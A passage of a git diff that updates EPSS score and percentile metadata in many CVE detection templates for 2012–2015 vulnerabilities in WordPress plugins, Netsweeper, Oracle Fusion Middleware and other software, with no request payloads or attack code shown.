a/http/cves/2012/CVE-2012-4768.yaml +++ b/http/cves/2012/CVE-2012-4768.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2012-4768 cwe-id: CWE-79 epss-score: 0.01936 - epss-percentile: 0.82977 + epss-percentile: 0.82974 cpe: cpe:2.3:a:mikejolley:download_monitor:3.3.5.7:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2012/CVE-2012-4878.yaml b/http/cves/2012/CVE-2012-4878.yaml index 6897cc8d30f..242f79d8a77 100644 --- a/http/cves/2012/CVE-2012-4878.yaml +++ b/http/cves/2012/CVE-2012-4878.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2012-4878 cwe-id: CWE-22 epss-score: 0.14501 - epss-percentile: 0.94239 + epss-percentile: 0.94237 cpe: cpe:2.3:a:flatnux:flatnux:2011-08-09-2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2012/CVE-2012-4889.yaml b/http/cves/2012/CVE-2012-4889.yaml index 64c06cb0ff0..b18e0bf4e72 100644 --- a/http/cves/2012/CVE-2012-4889.yaml +++ b/http/cves/2012/CVE-2012-4889.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2012-4889 cwe-id: CWE-79 epss-score: 0.03763 - epss-percentile: 0.87703 + epss-percentile: 0.87704 cpe: cpe:2.3:a:manageengine:firewall_analyzer:7.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2012/CVE-2012-4982.yaml b/http/cves/2012/CVE-2012-4982.yaml index 50e30e2bf8f..2ea892051c3 100644 --- a/http/cves/2012/CVE-2012-4982.yaml +++ b/http/cves/2012/CVE-2012-4982.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2012-4982 cwe-id: CWE-20 epss-score: 0.11642 - epss-percentile: 0.93448 + epss-percentile: 0.93442 cpe: cpe:2.3:a:forescout:counteract:6.3.4.10:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2012/CVE-2012-5321.yaml b/http/cves/2012/CVE-2012-5321.yaml index 788258c7d9b..2a22232072d 100644 --- a/http/cves/2012/CVE-2012-5321.yaml +++ b/http/cves/2012/CVE-2012-5321.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2012-5321 cwe-id: CWE-20 epss-score: 0.23135 - epss-percentile: 0.95745 + epss-percentile: 0.95749 cpe: cpe:2.3:a:tiki:tikiwiki_cms\/groupware:8.3:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2012/CVE-2012-5913.yaml b/http/cves/2012/CVE-2012-5913.yaml index 684fea8f8f8..5eca1cb15fa 100644 --- a/http/cves/2012/CVE-2012-5913.yaml +++ b/http/cves/2012/CVE-2012-5913.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2012-5913 cwe-id: CWE-79 epss-score: 0.01458 - epss-percentile: 0.80427 + epss-percentile: 0.80418 cpe: cpe:2.3:a:wordpress_integrator_project:wordpress_integrator:1.32:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2012/CVE-2012-6499.yaml b/http/cves/2012/CVE-2012-6499.yaml index 5bc0a9c4e5b..74dbbb95e0e 100644 --- a/http/cves/2012/CVE-2012-6499.yaml +++ b/http/cves/2012/CVE-2012-6499.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2012-6499 cwe-id: CWE-20 epss-score: 0.52894 - epss-percentile: 0.97859 + epss-percentile: 0.97855 cpe: cpe:2.3:a:age_verification_project:age_verification:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2013/CVE-2013-1965.yaml b/http/cves/2013/CVE-2013-1965.yaml index d18b8f6d16d..7fa34ea74bf 100644 --- a/http/cves/2013/CVE-2013-1965.yaml +++ b/http/cves/2013/CVE-2013-1965.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2013-1965 cwe-id: CWE-94 epss-score: 0.91504 - epss-percentile: 0.9965 + epss-percentile: 0.99649 cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2013/CVE-2013-2287.yaml b/http/cves/2013/CVE-2013-2287.yaml index 2b7a7d20525..1167a881f27 100644 --- a/http/cves/2013/CVE-2013-2287.yaml +++ b/http/cves/2013/CVE-2013-2287.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2013-2287 cwe-id: CWE-79 epss-score: 0.09211 - epss-percentile: 0.92464 + epss-percentile: 0.92461 cpe: cpe:2.3:a:roberta_bramski:uploader:1.0.4:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2013/CVE-2013-2621.yaml b/http/cves/2013/CVE-2013-2621.yaml index f9cec9a052d..3f94791d199 100644 --- a/http/cves/2013/CVE-2013-2621.yaml +++ b/http/cves/2013/CVE-2013-2621.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2013-2621 cwe-id: CWE-601 epss-score: 0.1019 - epss-percentile: 0.92909 + epss-percentile: 0.92902 cpe: cpe:2.3:a:telaen_project:telaen:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2013/CVE-2013-3526.yaml b/http/cves/2013/CVE-2013-3526.yaml index 80ff2c26469..5231e21094f 100644 --- a/http/cves/2013/CVE-2013-3526.yaml +++ b/http/cves/2013/CVE-2013-3526.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2013-3526 cwe-id: CWE-79 epss-score: 0.08185 - epss-percentile: 0.9194 + epss-percentile: 0.91937 cpe: cpe:2.3:a:wptrafficanalyzer:trafficanalyzer:1.0.0:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2013/CVE-2013-3827.yaml b/http/cves/2013/CVE-2013-3827.yaml index 3a5577d57be..cc7b171a046 100644 --- a/http/cves/2013/CVE-2013-3827.yaml +++ b/http/cves/2013/CVE-2013-3827.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2013-3827 cwe-id: NVD-CWE-noinfo epss-score: 0.91635 - epss-percentile: 0.9966 + epss-percentile: 0.99659 cpe: cpe:2.3:a:oracle:fusion_middleware:2.1.1:*:*:*:*:*:*:* metadata: max-request: 10 diff --git a/http/cves/2013/CVE-2013-4117.yaml b/http/cves/2013/CVE-2013-4117.yaml index 63402796e5d..8af35fc3d3c 100644 --- a/http/cves/2013/CVE-2013-4117.yaml +++ b/http/cves/2013/CVE-2013-4117.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2013-4117 cwe-id: CWE-79 epss-score: 0.11755 - epss-percentile: 0.93488 + epss-percentile: 0.93482 cpe: cpe:2.3:a:anshul_sharma:category-grid-view-gallery:2.3.1:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2013/CVE-2013-4625.yaml b/http/cves/2013/CVE-2013-4625.yaml index c5a4448d55b..39dddfb1b3c 100644 --- a/http/cves/2013/CVE-2013-4625.yaml +++ b/http/cves/2013/CVE-2013-4625.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2013-4625 cwe-id: CWE-79 epss-score: 0.06185 - epss-percentile: 0.90552 + epss-percentile: 0.90554 cpe: cpe:2.3:a:cory_lamle:duplicator:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2013/CVE-2013-5979.yaml b/http/cves/2013/CVE-2013-5979.yaml index 5dbbc403d80..febeeb97b5d 100644 --- a/http/cves/2013/CVE-2013-5979.yaml +++ b/http/cves/2013/CVE-2013-5979.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2013-5979 cwe-id: CWE-22 epss-score: 0.48856 - epss-percentile: 0.97671 + epss-percentile: 0.97667 cpe: cpe:2.3:a:springsignage:xibo:1.2.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2013/CVE-2013-6281.yaml b/http/cves/2013/CVE-2013-6281.yaml index e2f96ab7cd9..8b32c831b3c 100644 --- a/http/cves/2013/CVE-2013-6281.yaml +++ b/http/cves/2013/CVE-2013-6281.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2013-6281 cwe-id: CWE-79 epss-score: 0.08709 - epss-percentile: 0.92237 + epss-percentile: 0.92231 cpe: cpe:2.3:a:dhtmlx:dhtmlxspreadsheet:2.0:-:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2013/CVE-2013-7240.yaml b/http/cves/2013/CVE-2013-7240.yaml index 139ef9fe345..e0f62dec888 100644 --- a/http/cves/2013/CVE-2013-7240.yaml +++ b/http/cves/2013/CVE-2013-7240.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2013-7240 cwe-id: CWE-22 epss-score: 0.73626 - epss-percentile: 0.98765 + epss-percentile: 0.98764 cpe: cpe:2.3:a:westerndeal:advanced_dewplayer:1.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2013/CVE-2013-7285.yaml b/http/cves/2013/CVE-2013-7285.yaml index cacfff9fd89..fa4dd34af6e 100644 --- a/http/cves/2013/CVE-2013-7285.yaml +++ b/http/cves/2013/CVE-2013-7285.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2013-7285 cwe-id: CWE-78 epss-score: 0.15054 - epss-percentile: 0.94364 + epss-percentile: 0.9436 cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-100004.yaml b/http/cves/2014/CVE-2014-100004.yaml index e4c5c6aef2a..124ebedfb64 100644 --- a/http/cves/2014/CVE-2014-100004.yaml +++ b/http/cves/2014/CVE-2014-100004.yaml @@ -19,7 +19,7 @@ info: cvss-score: 6.1 cve-id: CVE-2014-100004 epss-score: 0.00385 - epss-percentile: 0.59178 + epss-percentile: 0.59175 cwe-id: CWE-79 cpe: cpe:2.3:a:sitecore:sitecore.net:*:*:*:*:*:*:*:* metadata: diff --git a/http/cves/2014/CVE-2014-2383.yaml b/http/cves/2014/CVE-2014-2383.yaml index 33a02bc00f5..38f69a59d02 100644 --- a/http/cves/2014/CVE-2014-2383.yaml +++ b/http/cves/2014/CVE-2014-2383.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2014-2383 cwe-id: CWE-200 epss-score: 0.44813 - epss-percentile: 0.97467 + epss-percentile: 0.97464 cpe: cpe:2.3:a:dompdf:dompdf:*:beta3:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2014/CVE-2014-2962.yaml b/http/cves/2014/CVE-2014-2962.yaml index fcd97194d25..bb0d6ffee23 100644 --- a/http/cves/2014/CVE-2014-2962.yaml +++ b/http/cves/2014/CVE-2014-2962.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2014-2962 cwe-id: CWE-22 epss-score: 0.87901 - epss-percentile: 0.99453 + epss-percentile: 0.99452 cpe: cpe:2.3:o:belkin:n150_f9k1009_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-3206.yaml b/http/cves/2014/CVE-2014-3206.yaml index d30164c66f8..d4123dfd110 100644 --- a/http/cves/2014/CVE-2014-3206.yaml +++ b/http/cves/2014/CVE-2014-3206.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2014-3206 cwe-id: CWE-20 epss-score: 0.9179 - epss-percentile: 0.9967 + epss-percentile: 0.99669 cpe: cpe:2.3:o:seagate:blackarmor_nas_220_firmware:-:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2014/CVE-2014-3744.yaml b/http/cves/2014/CVE-2014-3744.yaml index 065ab1cd9c5..0fa20070156 100644 --- a/http/cves/2014/CVE-2014-3744.yaml +++ b/http/cves/2014/CVE-2014-3744.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2014-3744 cwe-id: CWE-22 epss-score: 0.5516 - epss-percentile: 0.97975 + epss-percentile: 0.97972 cpe: cpe:2.3:a:nodejs:node.js:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-4210.yaml b/http/cves/2014/CVE-2014-4210.yaml index 114f669c0c6..e4783d386b7 100644 --- a/http/cves/2014/CVE-2014-4210.yaml +++ b/http/cves/2014/CVE-2014-4210.yaml @@ -20,8 +20,8 @@ info: cvss-score: 5 cve-id: CVE-2014-4210 cwe-id: NVD-CWE-noinfo - epss-score: 0.94152 - epss-percentile: 0.99909 + epss-score: 0.94148 + epss-percentile: 0.99908 cpe: cpe:2.3:a:oracle:fusion_middleware:10.0.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-4513.yaml b/http/cves/2014/CVE-2014-4513.yaml index 2b826d52798..80bd952710a 100644 --- a/http/cves/2014/CVE-2014-4513.yaml +++ b/http/cves/2014/CVE-2014-4513.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2014-4513 cwe-id: CWE-79 epss-score: 0.03718 - epss-percentile: 0.87626 + epss-percentile: 0.87628 cpe: cpe:2.3:a:activehelper:activehelper_livehelp_live_chat:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2014/CVE-2014-4536.yaml b/http/cves/2014/CVE-2014-4536.yaml index dd00328d0f6..9e2325fb090 100644 --- a/http/cves/2014/CVE-2014-4536.yaml +++ b/http/cves/2014/CVE-2014-4536.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2014-4536 cwe-id: CWE-79 epss-score: 0.02649 - epss-percentile: 0.8535 + epss-percentile: 0.85346 cpe: cpe:2.3:a:katz:infusionsoft_gravity_forms:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2014/CVE-2014-4539.yaml b/http/cves/2014/CVE-2014-4539.yaml index c7907fdb396..7230afd0fef 100644 --- a/http/cves/2014/CVE-2014-4539.yaml +++ b/http/cves/2014/CVE-2014-4539.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2014-4539 cwe-id: CWE-79 epss-score: 0.0161 - epss-percentile: 0.81348 + epss-percentile: 0.81339 cpe: cpe:2.3:a:movies_project:movies:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2014/CVE-2014-4544.yaml b/http/cves/2014/CVE-2014-4544.yaml index 3d2b0aaf147..45aa2e0c2d6 100644 --- a/http/cves/2014/CVE-2014-4544.yaml +++ b/http/cves/2014/CVE-2014-4544.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2014-4544 cwe-id: CWE-79 epss-score: 0.02584 - epss-percentile: 0.85175 + epss-percentile: 0.8517 cpe: cpe:2.3:a:podcast_channels_project:podcast_channels:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-4550.yaml b/http/cves/2014/CVE-2014-4550.yaml index a3a42213601..a60dfdb2954 100644 --- a/http/cves/2014/CVE-2014-4550.yaml +++ b/http/cves/2014/CVE-2014-4550.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2014-4550 cwe-id: CWE-79 epss-score: 0.02712 - epss-percentile: 0.85512 + epss-percentile: 0.85508 cpe: cpe:2.3:a:visualshortcodes:ninja:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2014/CVE-2014-4558.yaml b/http/cves/2014/CVE-2014-4558.yaml index cb5aeb63df6..fcee389ab3d 100644 --- a/http/cves/2014/CVE-2014-4558.yaml +++ b/http/cves/2014/CVE-2014-4558.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2014-4558 cwe-id: CWE-79 epss-score: 0.04411 - epss-percentile: 0.88675 + epss-percentile: 0.88674 cpe: cpe:2.3:a:cybercompany:swipehq-payment-gateway-woocommerce:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2014/CVE-2014-4561.yaml b/http/cves/2014/CVE-2014-4561.yaml index 937f6437cf6..b56a7ddf4ff 100644 --- a/http/cves/2014/CVE-2014-4561.yaml +++ b/http/cves/2014/CVE-2014-4561.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2014-4561 cwe-id: CWE-79 epss-score: 0.12801 - epss-percentile: 0.93797 + epss-percentile: 0.93793 cpe: cpe:2.3:a:ultimate-weather_project:ultimate-weather:1.0:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2014/CVE-2014-4577.yaml b/http/cves/2014/CVE-2014-4577.yaml index ffe2161202b..38f3c4565b7 100644 --- a/http/cves/2014/CVE-2014-4577.yaml +++ b/http/cves/2014/CVE-2014-4577.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2014-4577 cwe-id: CWE-22 epss-score: 0.06185 - epss-percentile: 0.90552 + epss-percentile: 0.90554 cpe: cpe:2.3:a:websupporter:wp_amasin_-_the_amazon_affiliate_shop:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-4940.yaml b/http/cves/2014/CVE-2014-4940.yaml index 7f503bfb68f..b8842a08ea8 100644 --- a/http/cves/2014/CVE-2014-4940.yaml +++ b/http/cves/2014/CVE-2014-4940.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2014-4940 cwe-id: CWE-22 epss-score: 0.57666 - epss-percentile: 0.98087 + epss-percentile: 0.98086 cpe: cpe:2.3:a:tera_charts_plugin_project:tera-charts:0.1:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-4941.yaml b/http/cves/2014/CVE-2014-4941.yaml index a2e096d6af3..f6ee38d44d9 100644 --- a/http/cves/2014/CVE-2014-4941.yaml +++ b/http/cves/2014/CVE-2014-4941.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2014-4941 cwe-id: CWE-22 epss-score: 0.01851 - epss-percentile: 0.82556 + epss-percentile: 0.82553 cpe: cpe:2.3:a:cross-rss_plugin_project:wp-cross-rss:1.7:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2014/CVE-2014-4942.yaml b/http/cves/2014/CVE-2014-4942.yaml index b693c4b1fa0..d9e72bb4141 100644 --- a/http/cves/2014/CVE-2014-4942.yaml +++ b/http/cves/2014/CVE-2014-4942.yaml @@ -21,8 +21,8 @@ info: cvss-score: 5 cve-id: CVE-2014-4942 cwe-id: CWE-200 - epss-score: 0.02447 - epss-percentile: 0.84791 + epss-score: 0.02509 + epss-percentile: 0.84956 cpe: cpe:2.3:a:levelfourdevelopment:wp-easycart:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-5111.yaml b/http/cves/2014/CVE-2014-5111.yaml index af7b9f35d66..8c79f912b10 100644 --- a/http/cves/2014/CVE-2014-5111.yaml +++ b/http/cves/2014/CVE-2014-5111.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2014-5111 cwe-id: CWE-22 epss-score: 0.66663 - epss-percentile: 0.98481 + epss-percentile: 0.98482 cpe: cpe:2.3:a:netfortris:trixbox:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-5181.yaml b/http/cves/2014/CVE-2014-5181.yaml index cea2a464a87..1fe04d6ac2a 100644 --- a/http/cves/2014/CVE-2014-5181.yaml +++ b/http/cves/2014/CVE-2014-5181.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2014-5181 cwe-id: CWE-22 epss-score: 0.00991 - epss-percentile: 0.76415 + epss-percentile: 0.76407 cpe: cpe:2.3:a:last.fm_rotation_plugin_project:lastfm-rotation_plugin:1.0:*:*:*:*:wordpress:*:* metadata: vendor: last.fm_rotation_plugin_project diff --git a/http/cves/2014/CVE-2014-5187.yaml b/http/cves/2014/CVE-2014-5187.yaml index 542e93211b3..67a76a040df 100644 --- a/http/cves/2014/CVE-2014-5187.yaml +++ b/http/cves/2014/CVE-2014-5187.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2014-5187 cwe-id: CWE-22 epss-score: 0.00991 - epss-percentile: 0.76415 + epss-percentile: 0.76407 cpe: cpe:2.3:a:tom_m8te_plugin_project:tom-m8te_plugin:1.5.3:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2014/CVE-2014-5258.yaml b/http/cves/2014/CVE-2014-5258.yaml index 557a79787a8..9a633e501d9 100644 --- a/http/cves/2014/CVE-2014-5258.yaml +++ b/http/cves/2014/CVE-2014-5258.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2014-5258 cwe-id: CWE-22 epss-score: 0.81937 - epss-percentile: 0.99165 + epss-percentile: 0.99167 cpe: cpe:2.3:a:webedition:webedition_cms:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-5368.yaml b/http/cves/2014/CVE-2014-5368.yaml index 3cdfe44eec3..5b818af2d09 100644 --- a/http/cves/2014/CVE-2014-5368.yaml +++ b/http/cves/2014/CVE-2014-5368.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2014-5368 cwe-id: CWE-22 epss-score: 0.53297 - epss-percentile: 0.97884 + epss-percentile: 0.97881 cpe: cpe:2.3:a:wp_content_source_control_project:wp_content_source_control:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-6308.yaml b/http/cves/2014/CVE-2014-6308.yaml index 3fa86a7c3ac..f2400729a6f 100644 --- a/http/cves/2014/CVE-2014-6308.yaml +++ b/http/cves/2014/CVE-2014-6308.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2014-6308 cwe-id: CWE-22 epss-score: 0.69729 - epss-percentile: 0.98608 + epss-percentile: 0.98609 cpe: cpe:2.3:a:osclass:osclass:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-8682.yaml b/http/cves/2014/CVE-2014-8682.yaml index a474e85dfde..3d3332b6b0d 100644 --- a/http/cves/2014/CVE-2014-8682.yaml +++ b/http/cves/2014/CVE-2014-8682.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2014-8682 cwe-id: CWE-89 epss-score: 0.66731 - epss-percentile: 0.98484 + epss-percentile: 0.98486 cpe: cpe:2.3:a:gogits:gogs:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-9094.yaml b/http/cves/2014/CVE-2014-9094.yaml index e8a31c52afe..6689c013ea6 100644 --- a/http/cves/2014/CVE-2014-9094.yaml +++ b/http/cves/2014/CVE-2014-9094.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2014-9094 cwe-id: CWE-79 epss-score: 0.14728 - epss-percentile: 0.94285 + epss-percentile: 0.94281 cpe: cpe:2.3:a:digitalzoomstudio:video_gallery:-:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2014/CVE-2014-9180.yaml b/http/cves/2014/CVE-2014-9180.yaml index b6ca106b059..6251e69c3da 100644 --- a/http/cves/2014/CVE-2014-9180.yaml +++ b/http/cves/2014/CVE-2014-9180.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2014-9180 cwe-id: CWE-601 epss-score: 0.0844 - epss-percentile: 0.92071 + epss-percentile: 0.92067 cpe: cpe:2.3:a:eleanor-cms:eleanor_cms:-:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2014/CVE-2014-9444.yaml b/http/cves/2014/CVE-2014-9444.yaml index 72e03134eb4..b8214a74ca0 100644 --- a/http/cves/2014/CVE-2014-9444.yaml +++ b/http/cves/2014/CVE-2014-9444.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2014-9444 cwe-id: CWE-79 epss-score: 0.03285 - epss-percentile: 0.86833 + epss-percentile: 0.86835 cpe: cpe:2.3:a:frontend_uploader_project:frontend_uploader:0.9.2:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-9606.yaml b/http/cves/2014/CVE-2014-9606.yaml index 4cd90b4b22a..5dea3477756 100644 --- a/http/cves/2014/CVE-2014-9606.yaml +++ b/http/cves/2014/CVE-2014-9606.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2014-9606 cwe-id: CWE-79 epss-score: 0.09412 - epss-percentile: 0.92555 + epss-percentile: 0.92549 cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-9607.yaml b/http/cves/2014/CVE-2014-9607.yaml index 54711abe5a2..38ce4b0ee61 100644 --- a/http/cves/2014/CVE-2014-9607.yaml +++ b/http/cves/2014/CVE-2014-9607.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2014-9607 cwe-id: CWE-79 epss-score: 0.08963 - epss-percentile: 0.92351 + epss-percentile: 0.92345 cpe: cpe:2.3:a:netsweeper:netsweeper:4.0.3:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-9608.yaml b/http/cves/2014/CVE-2014-9608.yaml index 4da9641ae6e..3fd3303735d 100644 --- a/http/cves/2014/CVE-2014-9608.yaml +++ b/http/cves/2014/CVE-2014-9608.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2014-9608 cwe-id: CWE-79 epss-score: 0.25742 - epss-percentile: 0.96076 + epss-percentile: 0.9608 cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-9614.yaml b/http/cves/2014/CVE-2014-9614.yaml index e1852aa652a..9c4f2923b39 100644 --- a/http/cves/2014/CVE-2014-9614.yaml +++ b/http/cves/2014/CVE-2014-9614.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2014-9614 cwe-id: CWE-798 epss-score: 0.69538 - epss-percentile: 0.98599 + epss-percentile: 0.98601 cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-9615.yaml b/http/cves/2014/CVE-2014-9615.yaml index 335abe07cca..292f3418b67 100644 --- a/http/cves/2014/CVE-2014-9615.yaml +++ b/http/cves/2014/CVE-2014-9615.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2014-9615 cwe-id: CWE-79 epss-score: 0.15696 - epss-percentile: 0.94497 + epss-percentile: 0.94495 cpe: cpe:2.3:a:netsweeper:netsweeper:4.0.4:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-9617.yaml b/http/cves/2014/CVE-2014-9617.yaml index 02297f265ba..a8f6e152bbf 100644 --- a/http/cves/2014/CVE-2014-9617.yaml +++ b/http/cves/2014/CVE-2014-9617.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2014-9617 cwe-id: CWE-601 epss-score: 0.26191 - epss-percentile: 0.96136 + epss-percentile: 0.96139 cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-9618.yaml b/http/cves/2014/CVE-2014-9618.yaml index d11dc41d878..d7a23fe9d17 100644 --- a/http/cves/2014/CVE-2014-9618.yaml +++ b/http/cves/2014/CVE-2014-9618.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2014-9618 cwe-id: CWE-287 epss-score: 0.68171 - epss-percentile: 0.98538 + epss-percentile: 0.9854 cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-9735.yaml b/http/cves/2014/CVE-2014-9735.yaml index 25edd5bf1ca..b718a889762 100644 --- a/http/cves/2014/CVE-2014-9735.yaml +++ b/http/cves/2014/CVE-2014-9735.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2014-9735 cwe-id: CWE-264 epss-score: 0.82749 - epss-percentile: 0.99214 + epss-percentile: 0.99213 cpe: cpe:2.3:a:themepunch:showbiz_pro:*:*:*:*:*:wordpress:*:* metadata: vendor: themepunch diff --git a/http/cves/2015/CVE-2015-0554.yaml b/http/cves/2015/CVE-2015-0554.yaml index 7a2790b390b..977815f0861 100644 --- a/http/cves/2015/CVE-2015-0554.yaml +++ b/http/cves/2015/CVE-2015-0554.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2015-0554 cwe-id: CWE-264 epss-score: 0.38604 - epss-percentile: 0.97121 + epss-percentile: 0.9712 cpe: cpe:2.3:o:adb:p.dga4001n_firmware:pdg_tef_sp_4.06l.6:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-1000012.yaml b/http/cves/2015/CVE-2015-1000012.yaml index bd4397fd782..1bec2f7da15 100644 --- a/http/cves/2015/CVE-2015-1000012.yaml +++ b/http/cves/2015/CVE-2015-1000012.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2015-1000012 cwe-id: CWE-200 epss-score: 0.68585 - epss-percentile: 0.98558 + epss-percentile: 0.9856 cpe: cpe:2.3:a:mypixs_project:mypixs:0.3:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-10141.yaml b/http/cves/2015/CVE-2015-10141.yaml index e79323f73c4..aa8c4e1993e 100644 --- a/http/cves/2015/CVE-2015-10141.yaml +++ b/http/cves/2015/CVE-2015-10141.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2015-10141 cwe-id: CWE-78 epss-score: 0.57243 - epss-percentile: 0.98065 + epss-percentile: 0.98064 metadata: verified: true max-request: 1 diff --git a/http/cves/2015/CVE-2015-2067.yaml b/http/cves/2015/CVE-2015-2067.yaml index ff47cbd3d22..5fb1dd850cd 100644 --- a/http/cves/2015/CVE-2015-2067.yaml +++ b/http/cves/2015/CVE-2015-2067.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2015-2067 cwe-id: CWE-22 epss-score: 0.82764 - epss-percentile: 0.99216 + epss-percentile: 0.99215 cpe: cpe:2.3:a:magmi_project:magmi:-:*:*:*:*:magento_server:*:* 